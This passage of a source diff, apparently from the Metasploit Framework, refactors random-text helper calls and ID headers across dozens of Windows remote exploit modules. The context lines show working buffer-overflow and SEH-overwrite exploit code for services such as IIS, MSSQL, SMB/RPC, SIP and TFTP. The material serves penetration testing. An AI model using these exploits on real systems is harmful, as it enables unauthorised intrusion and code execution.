buf = Rex::Text.rand_text_alphanumeric(6196, payload_badchars)
|
||||
buf = rand_text_alphanumeric(6196, payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
req = 'a01 SELECT ' + buf + seh + "\r\n"
|
||||
sock.put(req)
|
||||
|
|
|
|||
|
|
@ -68,7 +68,7 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
|
|||
|
||||
print_status("Creating overflow request for fp30reg.dll...")
|
||||
|
||||
pat = Rex::Text.rand_text_alphanumeric(0xdead)
|
||||
pat = rand_text_alphanumeric(0xdead)
|
||||
pat[128, 4] = [target.ret].pack('V')
|
||||
pat[264, 4] = [target.ret].pack('V')
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -88,7 +88,7 @@ class Exploits::Windows::Isapi::RSA_WebAgent_Redirect < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
|
||||
pat = Rex::Text.rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK
|
||||
pat = rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK
|
||||
seh = generate_seh_payload(target['Rets'][1])
|
||||
pat[target['Rets'][0]-4, seh.length] = seh
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -105,7 +105,7 @@ class Exploits::Windows::Isapi::IIS_W3WHO_Overflow < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
|
||||
buf = Rex::Text.rand_text_english(8192, payload_badchars)
|
||||
buf = rand_text_english(8192, payload_badchars)
|
||||
buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
|
||||
buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
|
||||
buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -85,7 +85,7 @@ class Exploits::Windows::License::Sentinel_LM7_UDP_Overflow < Msf::Exploit::Remo
|
|||
connect_udp
|
||||
|
||||
# Payload goes first
|
||||
buf = payload.encoded + Rex::Text.rand_text_english(2048-payload.encoded.length)
|
||||
buf = payload.encoded + rand_text_english(2048-payload.encoded.length)
|
||||
|
||||
# Return to a pop/pop/ret via SEH
|
||||
buf[836, 4] = [target.ret].pack('V')
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -64,7 +64,7 @@ class Exploits::Windows::Lpd::Hummingbird_Exceed_Lpd < Msf::Exploit::Remote
|
|||
def exploit
|
||||
connect
|
||||
|
||||
filler = Rex::Text.rand_text_english(target['Offset'], payload_badchars)
|
||||
filler = rand_text_english(target['Offset'], payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
sploit = filler + seh
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -58,7 +58,7 @@ class Exploits::Windows::Lpd::HNIPrintd < Msf::Exploit::Remote
|
|||
def exploit
|
||||
connect
|
||||
|
||||
req = Rex::Text.rand_text_alphanumeric(8192)
|
||||
req = rand_text_alphanumeric(8192)
|
||||
req[ 0, 2] = "\xeb\x33"
|
||||
req[ 49, 4] = [target.ret].pack('V')
|
||||
req[ 53, payload.encoded.length ] = payload.encoded
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -92,7 +92,7 @@ class Exploits::Windows::Misc::Eiqnetworks_LICMGR_ADDLICENSE < Msf::Exploit::Rem
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
filler = Rex::Text.rand_text_english(1) * (target['Offset'] - payload.encoded.length)
|
||||
filler = rand_text_english(1) * (target['Offset'] - payload.encoded.length)
|
||||
sploit = "LICMGR_ADDLICENSE&" + filler + payload.encoded + [target.ret].pack('V') + "&";
|
||||
|
||||
sock.put(sploit)
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -73,7 +73,7 @@ class Exploits::Windows::Misc::Eiqnetworks_Esa_Topology_DELETEDEVICE < Msf::Expl
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
filler = Rex::Text.rand_text_alphanumeric(128) + [target.ret].pack('V') + make_nops(20)
|
||||
filler = rand_text_alphanumeric(128) + [target.ret].pack('V') + make_nops(20)
|
||||
|
||||
sploit = "DELETEDEVICE&" + filler + payload.encoded
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -61,7 +61,7 @@ class Exploits::Windows::Misc::Goodtech_Telnet < Msf::Exploit::Remote
|
|||
def exploit
|
||||
connect
|
||||
|
||||
sploit = Rex::Text.rand_text_english(10020, payload_badchars)
|
||||
sploit = rand_text_english(10020, payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
|
||||
sploit[10012, seh.length] = seh
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -68,7 +68,7 @@ class Exploits::Windows::Misc::Mercury_Phonebook < Msf::Exploit::Remote
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
sploit = Rex::Text.rand_text_alphanumeric(224, payload_badchars)
|
||||
sploit = rand_text_alphanumeric(224, payload_badchars)
|
||||
sploit << payload.encoded + "\xeb\x06" + make_nops(2)
|
||||
sploit << [target.ret].pack('V') + [0xe8, -450].pack('CV') + "\r\n"
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -69,14 +69,14 @@ class Exploits::Windows::Misc::Shixxnote_font < Msf::Exploit::Remote
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
sploit = Rex::Text.rand_text_alpha_upper(8, payload_badchars)
|
||||
sploit = rand_text_alpha_upper(8, payload_badchars)
|
||||
sploit += "~~"
|
||||
sploit += Rex::Text.rand_text_alpha_upper(118, payload_badchars)
|
||||
sploit += rand_text_alpha_upper(118, payload_badchars)
|
||||
|
||||
seh = generate_seh_payload(target.ret)
|
||||
|
||||
sploit[112, seh.length] = seh
|
||||
sploit += Rex::Text.rand_text_alpha_upper(200, payload_badchars)
|
||||
sploit += rand_text_alpha_upper(200, payload_badchars)
|
||||
sploit += "~" * 10
|
||||
|
||||
sock.put(sploit)
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -89,7 +89,7 @@ class Exploits::Windows::Mssql::MS02_039_ResOverflow < Msf::Exploit::Remote
|
|||
print_status("Execute 'net start sqlserveragent' once access is obtained");
|
||||
|
||||
# \x68:888 => push dword 0x3838383a
|
||||
buf = "\x04" + Rex::Text.rand_text_english(800, payload_badchars) + "\x68:888"
|
||||
buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888"
|
||||
|
||||
# Return to the stack pointer
|
||||
buf[ 97, 4] = [target.ret].pack('V')
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -80,14 +80,14 @@ class Exploits::Windows::Mssql::MS02_056_HelloOverflow < Msf::Exploit::Remote
|
|||
buf = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b" +
|
||||
"\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02" +
|
||||
"\x10\x00\x00\x00" +
|
||||
Rex::Text.rand_text_english(528, payload_badchars) +
|
||||
rand_text_english(528, payload_badchars) +
|
||||
"\x1B\xA5\xEE\x34" +
|
||||
Rex::Text.rand_text_english(4, payload_badchars) +
|
||||
rand_text_english(4, payload_badchars) +
|
||||
[ target['Rets'][0] ].pack('V') +
|
||||
[ target['Rets'][1], target['Rets'][1] ].pack('VV') +
|
||||
'3333' +
|
||||
[ target['Rets'][1], target['Rets'][1] ].pack('VV') +
|
||||
Rex::Text.rand_text_english(88, payload_badchars) +
|
||||
rand_text_english(88, payload_badchars) +
|
||||
payload.encoded +
|
||||
"\x00\x24\x01\x00\x00"
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -73,7 +73,7 @@ class Exploits::Windows::Proxy::Bluecoat_WinProxy_Host < Msf::Exploit::Remote
|
|||
|
||||
sploit = "GET / HTTP/1.1" + "\r\n"
|
||||
sploit += "Host: 127.0.0.1:"
|
||||
sploit += Rex::Text.rand_text_english(31, payload_badchars)
|
||||
sploit += rand_text_english(31, payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
sploit[23, seh.length] = seh
|
||||
sploit += "\r\n\r\n"
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -69,7 +69,7 @@ class Exploits::Windows::Proxy::ProxyPro_Http_Get < Msf::Exploit::Remote
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
sploit = "GET /" + Rex::Text.rand_text_english(3603, payload_badchars)
|
||||
sploit = "GET /" + rand_text_english(3603, payload_badchars)
|
||||
sploit += payload.encoded + [target.ret].pack('V') + make_nops(10)
|
||||
sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n"
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -65,9 +65,9 @@ class Exploits::Windows::Sip::Aim_Triton_Cseq < Msf::Exploit::Remote
|
|||
def exploit
|
||||
connect_udp
|
||||
|
||||
user = Rex::Text.rand_text_english(2, payload_badchars)
|
||||
user = rand_text_english(2, payload_badchars)
|
||||
port = rand(65535).to_s
|
||||
filler = Rex::Text.rand_text_english(792, payload_badchars)
|
||||
filler = rand_text_english(792, payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
filler[780, seh.length] = seh
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -70,9 +70,9 @@ class Exploits::Windows::Sip::Sipfoundry_CSeq < Msf::Exploit::Remote
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
user = Rex::Text.rand_text_english(2, payload_badchars)
|
||||
user = rand_text_english(2, payload_badchars)
|
||||
port = rand(65535).to_s
|
||||
filler = Rex::Text.rand_text_english(260, payload_badchars)
|
||||
filler = rand_text_english(260, payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
filler[252, seh.length] = seh
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -65,9 +65,9 @@ class Exploits::Windows::Sip::Sipxphone_Cseq < Msf::Exploit::Remote
|
|||
def exploit
|
||||
connect_udp
|
||||
|
||||
user = Rex::Text.rand_text_english(2, payload_badchars)
|
||||
user = rand_text_english(2, payload_badchars)
|
||||
port = rand(65535).to_s
|
||||
filler = Rex::Text.rand_text_english(212, payload_badchars)
|
||||
filler = rand_text_english(212, payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
filler[204, seh.length] = seh
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -88,7 +88,7 @@ class Exploits::Windows::Smb::MS03_049_NETAPI < Msf::Exploit::Remote
|
|||
print_status("Building the stub data...")
|
||||
|
||||
|
||||
name = Rex::Text.rand_text_alphanumeric(5000)
|
||||
name = rand_text_alphanumeric(5000)
|
||||
name[3496, 4] = [target.ret].pack('V')
|
||||
name[3492, 2] = "\xeb\x06"
|
||||
name[3500, 5] = "\xe9" + [-3505].pack('V')
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -105,7 +105,7 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
|
|||
# jumps over the return address, some trash, and into the
|
||||
# final payload. Easy as pie.
|
||||
when /Windows 5\.0/
|
||||
str = Rex::Text.rand_text_alphanumeric(3500)
|
||||
str = rand_text_alphanumeric(3500)
|
||||
str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
|
||||
str[2104, payload.encoded.length ] = payload.encoded
|
||||
string = NDR.UnicodeConformantVaryingString(str)
|
||||
|
|
@ -116,7 +116,7 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
|
|||
# buffer, giving us about 1936 bytes of space for a
|
||||
# payload.
|
||||
when /Windows 5\.1/
|
||||
str = Rex::Text.rand_text_alphanumeric(7000)
|
||||
str = rand_text_alphanumeric(7000)
|
||||
str[0, payload.encoded.length ] = payload.encoded
|
||||
str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
|
||||
str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
|
||||
|
|
@ -138,8 +138,8 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
|
|||
NDR.UnicodeConformantVaryingString('') +
|
||||
NDR.long(rand(0xFFFFFF)) +
|
||||
NDR.UnicodeConformantVaryingString('') +
|
||||
Rex::Text.rand_text(528) +
|
||||
Rex::Text.rand_text(528) +
|
||||
rand_text(528) +
|
||||
rand_text(528) +
|
||||
NDR.long(rand(0xFFFFFF))
|
||||
|
||||
print_status("Trying to exploit #{os}")
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -136,7 +136,7 @@ class Exploits::Windows::Smb::MS05_039_PNP < Msf::Exploit::Remote
|
|||
NDR.long(0) + # CSD_LegacyDataOffset
|
||||
NDR.long(req.length) + # CSD_LegacyDataSize
|
||||
NDR.long(0) + # CSD_Flags
|
||||
Rex::Text.rand_text(16) + # GUID
|
||||
rand_text(16) + # GUID
|
||||
req # CSD_LegacyData
|
||||
|
||||
# PNP_QueryResConfList(L"a\\b\\c", 0xffff, (char *)pClassResource, 1000, foo, 4, 0);
|
||||
|
|
@ -188,20 +188,20 @@ class Exploits::Windows::Smb::MS05_039_PNP < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
# Pad the string up to reach our SEH frame
|
||||
buf = Rex::Text.rand_text(target['Offset'] ? target['Offset'] : 56)
|
||||
buf = rand_text(target['Offset'] ? target['Offset'] : 56)
|
||||
|
||||
# Jump over the address and our invalid pointer to the payload
|
||||
buf << Rex::Arch::X86.jmp_short('$+32')
|
||||
buf << Rex::Text.rand_text(2)
|
||||
buf << rand_text(2)
|
||||
|
||||
# The SEH handler pointer
|
||||
buf << [target.ret].pack('V')
|
||||
|
||||
# Some padding to reach the next pointer
|
||||
buf << Rex::Text.rand_text(20)
|
||||
buf << rand_text(20)
|
||||
|
||||
# ResourceName - cause access violation on RtlInitUnicodeString
|
||||
buf << Rex::Text.rand_text(3) + "\xff"
|
||||
buf << rand_text(3) + "\xff"
|
||||
|
||||
# Append the encoded payload and we are good to go!
|
||||
buf << payload.encoded
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -98,21 +98,21 @@ class Exploits::Windows::Smb::MS06_025_RRAS < Msf::Exploit::Remote
|
|||
pat =
|
||||
payload.encoded +
|
||||
"\xeb\x06" +
|
||||
Rex::Text.rand_text_alphanumeric(2) +
|
||||
rand_text_alphanumeric(2) +
|
||||
[target.ret].pack('V') +
|
||||
"\xe9\xb7\xfb\xff\xff"
|
||||
os = 'Windows 2000'
|
||||
when /Windows 5\.1/
|
||||
pat =
|
||||
Rex::Text.rand_text_alphanumeric(0x4c) +
|
||||
rand_text_alphanumeric(0x4c) +
|
||||
"\xeb\x06" +
|
||||
Rex::Text.rand_text_alphanumeric(2) +
|
||||
rand_text_alphanumeric(2) +
|
||||
[target.ret].pack('V') +
|
||||
payload.encoded
|
||||
os = 'Windows XP'
|
||||
end
|
||||
|
||||
req = [1, 0x49].pack('VV') + pat + Rex::Text.rand_text_alphanumeric(0x4000-pat.length)
|
||||
req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000-pat.length)
|
||||
len = req.length
|
||||
stb =
|
||||
NDR.long(0x20000) +
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -192,31 +192,31 @@ class Exploits::Windows::Smb::MS06_040_NETAPI < Msf::Exploit::Remote
|
|||
payload.encoded +
|
||||
|
||||
# Padding
|
||||
Rex::Text.rand_text_alphanumeric(target['Offset'] - payload.encoded.length) +
|
||||
rand_text_alphanumeric(target['Offset'] - payload.encoded.length) +
|
||||
|
||||
# Land 6 bytes in to bypass garbage (XP SP0)
|
||||
[ target.ret + 6 ].pack('V') +
|
||||
|
||||
# Padding
|
||||
Rex::Text.rand_text_alphanumeric(8) +
|
||||
rand_text_alphanumeric(8) +
|
||||
|
||||
# Address to write our shellcode (XP SP0)
|
||||
[ target.ret ].pack('V') +
|
||||
|
||||
# Padding
|
||||
Rex::Text.rand_text_alphanumeric(32) +
|
||||
rand_text_alphanumeric(32) +
|
||||
|
||||
# Jump straight to shellcode (XP SP1)
|
||||
[ target.ret ].pack('V') +
|
||||
|
||||
# Padding
|
||||
Rex::Text.rand_text_alphanumeric(8) +
|
||||
rand_text_alphanumeric(8) +
|
||||
|
||||
# Address to write our shellcode (XP SP1)
|
||||
[ target.ret ].pack('V') +
|
||||
|
||||
# Padding
|
||||
Rex::Text.rand_text_alphanumeric(32) +
|
||||
rand_text_alphanumeric(32) +
|
||||
|
||||
# Terminate the path
|
||||
"\x00\x00"
|
||||
|
|
@ -232,7 +232,7 @@ class Exploits::Windows::Smb::MS06_040_NETAPI < Msf::Exploit::Remote
|
|||
|
||||
|
||||
when /stack/
|
||||
buff = Rex::Text.rand_text_alphanumeric(800)
|
||||
buff = rand_text_alphanumeric(800)
|
||||
buff[0, payload.encoded.length] = payload.encoded
|
||||
buff[ target['OffsetA'], 4 ] = [target.ret].pack('V')
|
||||
buff[ target['OffsetB'], 5 ] = "\xe9" + [ (target['OffsetA'] + 5) * -1 ].pack('V')
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -86,14 +86,14 @@ class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote
|
|||
|
||||
# Add giant blocks of guard data before and after the egg
|
||||
eggdata =
|
||||
Rex::Text.rand_text(1024) +
|
||||
rand_text(1024) +
|
||||
egg +
|
||||
egg +
|
||||
payload.encoded +
|
||||
Rex::Text.rand_text(1024)
|
||||
rand_text(1024)
|
||||
|
||||
buflen = 295
|
||||
ofstring = Rex::Text.to_unicode('\\\\') + "\x90" + hunter[0] + Rex::Text.rand_text(buflen-hunter[0].length) +
|
||||
ofstring = Rex::Text.to_unicode('\\\\') + "\x90" + hunter[0] + rand_text(buflen-hunter[0].length) +
|
||||
[ target.ret ].pack('V') + "\x00"
|
||||
#ofstring = Rex::Text.to_unicode('\\\\') + payload.encoded + [ target.ret ].pack('V') + "\x00\x00"
|
||||
stubdata =
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -77,16 +77,16 @@ class Exploits::Windows::Smb::MS06_066_NWWKS < Msf::Exploit::Remote
|
|||
# [in] [unique] wchar *
|
||||
# [out] long
|
||||
|
||||
ofstring = Rex::Text.to_unicode('\\\\') + Rex::Text.rand_text(292) + [ target.ret ].pack('V') + "\x00\x00"
|
||||
ofstring = Rex::Text.to_unicode('\\\\') + rand_text(292) + [ target.ret ].pack('V') + "\x00\x00"
|
||||
stubdata =
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") +
|
||||
NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + "\x00\x00") +
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") +
|
||||
NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") +
|
||||
NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
|
||||
NDR.UnicodeConformantVaryingStringPreBuilt(ofstring)
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -88,7 +88,7 @@ class Exploits::Windows::Smtp::MS06_019_EXCHANGE < Msf::Exploit::Remote
|
|||
modproplong << modprops[rand(modprops.size)] + ","
|
||||
}
|
||||
|
||||
boundry = Rex::Text.rand_text_alphanumeric(8) + "." + Rex::Text.rand_text_alphanumeric(8)
|
||||
boundry = rand_text_alphanumeric(8) + "." + rand_text_alphanumeric(8)
|
||||
|
||||
|
||||
# Really, the randomization above only crashes /sometimes/ - it's MUCH more
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -68,8 +68,8 @@ class Exploits::Windows::Ssh::Freesshd_key_exchange < Msf::Exploit::Remote
|
|||
sploit = "SSH-2.0-OpenSSH_3.9p1"
|
||||
sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
|
||||
sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
|
||||
sploit << Rex::Text.rand_text_alphanumeric(1055) + [target.ret].pack('V')
|
||||
sploit << payload.encoded + Rex::Text.rand_text_alphanumeric(19000) + "\r\n"
|
||||
sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
|
||||
sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"
|
||||
|
||||
res = sock.recv(22)
|
||||
if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/)
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -64,7 +64,7 @@ class Exploits::Windows::Ssh::Securecrt_Ssh1 < Exploit::Remote
|
|||
def on_client_connect(client)
|
||||
return if ((p = regenerate_payload(client)) == nil)
|
||||
|
||||
buffer = "SSH-1.1-OpenSSH_3.6.1p2\r\n" + Rex::Text.rand_text_english(243)
|
||||
buffer = "SSH-1.1-OpenSSH_3.6.1p2\r\n" + rand_text_english(243)
|
||||
buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded
|
||||
|
||||
print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -145,7 +145,7 @@ class Exploits::Windows::Ssl::MS04_011_PCT < Msf::Exploit::Remote
|
|||
if (datastore['PROTO'] == 'smtp')
|
||||
greeting = sock.get_once
|
||||
|
||||
sock.put('HELO ' + (Rex::Text.rand_text_alphanumeric(rand(10)+1)) + "\r\n")
|
||||
sock.put('HELO ' + (rand_text_alphanumeric(rand(10)+1)) + "\r\n")
|
||||
resp = sock.get_once
|
||||
|
||||
sock.put("STARTTLS\r\n")
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -79,8 +79,8 @@ class Exploits::Windows::Tftp::Futuresoft_TFTPD_TransferMode < Msf::Exploit::Rem
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
sploit = "\x00\x01" + Rex::Text.rand_text_english(14, payload_badchars) + "\x00"
|
||||
sploit += Rex::Text.rand_text_english(167, payload_badchars)
|
||||
sploit = "\x00\x01" + rand_text_english(14, payload_badchars) + "\x00"
|
||||
sploit += rand_text_english(167, payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
sploit[157, seh.length] = seh
|
||||
sploit += "\x00"
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -73,9 +73,9 @@ class Exploits::Windows::Tftp::Tftpd32_Long_Filename < Msf::Exploit::Remote
|
|||
|
||||
sploit =
|
||||
"\x00\x01" +
|
||||
Rex::Text.rand_text_english(120, payload_badchars) +
|
||||
rand_text_english(120, payload_badchars) +
|
||||
"." +
|
||||
Rex::Text.rand_text_english(135, payload_badchars) +
|
||||
rand_text_english(135, payload_badchars) +
|
||||
[target.ret].pack('V') +
|
||||
payload.encoded +
|
||||
"\x00"
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -76,7 +76,7 @@ class Exploits::Windows::Unicenter::CAM_LOG_SECURITY < Msf::Exploit::Remote
|
|||
print_status("The CAM service is not responding")
|
||||
end
|
||||
|
||||
buf = Rex::Text.rand_text_english(4096, payload_badchars)
|
||||
buf = rand_text_english(4096, payload_badchars)
|
||||
|
||||
# Offset 1016 for EIP, 1024 = ESP, 1052 = ESI
|
||||
buf[ 1016, 4 ] = [target.ret].pack('V')
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
@ -121,7 +121,7 @@ class Exploits::Windows::Wins::MS04_045 < Msf::Exploit::Remote
|
|||
|
||||
wins = addr * 10
|
||||
wins << payload.encoded
|
||||
wins << Rex::Text.rand_text_english(9200-wins.length, payload_badchars)
|
||||
wins << rand_text_english(9200-wins.length, payload_badchars)
|
||||
|
||||
wpkt = [wins.length + 8, -1, base].pack('NNN')
|
||||
wpkt << wins
|
||||
|
|
|
|||
Loading…
Reference in New Issue